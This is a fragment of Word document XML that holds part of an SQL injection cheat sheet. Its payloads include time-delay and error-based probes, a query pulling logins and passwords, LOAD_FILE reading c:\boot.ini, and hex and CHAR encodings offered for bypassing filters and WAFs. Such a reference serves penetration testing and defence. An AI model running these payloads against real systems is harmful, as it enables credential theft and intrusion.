      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>; END IF; END;</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (O)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IF (1=1) THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCE9022"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PostgreSQL If Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287C4C88" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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CASE WHEN </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>condition</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> THEN </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>true-part</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> ELSE </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>false-part</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> END; (P)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CASE WEHEN (1=1) THEN 'A' ELSE 'B'END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4390D1B3" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="SampleIfStatements"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>If Statement SQL Injection Attack Samples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C9A721"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if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (S) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>This will throw an </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>divide by zero error</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> if current logged user is not </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>"sa" or "dbo"</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441D746E"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bookmarkStart w:id="14" w:name="UsingIntegers"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Using Integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390878D4"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Very useful for bypassing, </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>magic_quotes() and similar filters</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, or even WAFs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151020D4" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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0x</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>HEXNUMBER</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (SM) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>You can  write hex like these; </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CHAR(0x66)</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (S)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0x5045</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>this is not an integer it will be a string from Hex</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>) (M)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0x50 + 0x45</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>this is integer now!</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>) (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C82741"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bookmarkStart w:id="15" w:name="StringOperations"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>String  Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6796B1F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String related operations. These can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B364A44"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16" w:name="StringConcat"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>String Concatenation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCBDE02" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (S)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login + '-' + password FROM members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0410BB43" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (*MO)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login || '-' || password FROM members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ECA63A"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t>*About MySQL "||";</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If MySQL is running in ANSI mode it's going to work but otherwise MySQL accept it as `logical operator` it'll return 0. A better way to do it is using </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>CONCAT()</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>function in MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B1AAFA" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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CONCAT(str1, str2, str3, ...)</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (M) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Concatenate supplied strings.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CONCAT(login, password) FROM members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F92397"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bookmarkStart w:id="17" w:name="StringwithoutQuotes"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Strings without Quotes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD751D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These are some direct ways to using strings but it's always possible to use </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>CHAR()</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>(MS) and </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>CONCAT()</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>(M) to generate string without quotes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6B73DA" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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0x457578</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (M) - Hex Representation of string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0x457578</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This will be selected as string in MySQL. </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br/>
        <w:t>In MySQL easy way to generate hex representations of strings use this;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CONCAT('0x',HEX('c:\\boot.ini'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B486EB9" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Using </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>CONCAT()</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> in MySQL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CONCAT(CHAR(75),CHAR(76),CHAR(77))</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (M) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>This will return 'KLM'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CCAB37" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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CHAR(75)+CHAR(76)+CHAR(77)</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (S) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>This will return 'KLM'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD12822" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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CHR(75)||CHR(76)||CHR(77)</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (O) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>This will return 'KLM'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FD8150" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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(CHaR(75)||CHaR(76)||CHaR(77))</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (P) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>This will return 'KLM'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C568F30"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18" w:name="HexbasedSamples"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Hex based SQL Injection Samples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBFF5F6" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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LOAD_FILE(0x633A5C626F6F742E696E69)</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (M) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>This will show the content of </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>c:\boot.ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524BA9D2"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bookmarkStart w:id="19" w:name="StringModification"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>String Modification &amp; Related</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBEB3C2" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ASCII()</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (SMP) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Returns ASCII character value of leftmost character. A must have function for Blind SQL Injections. </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ASCII('a')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E02E47B" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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CHAR()</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (SM) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Convert an integer of ASCII. </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CHAR(64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700415B4" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="750" w:after="450" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
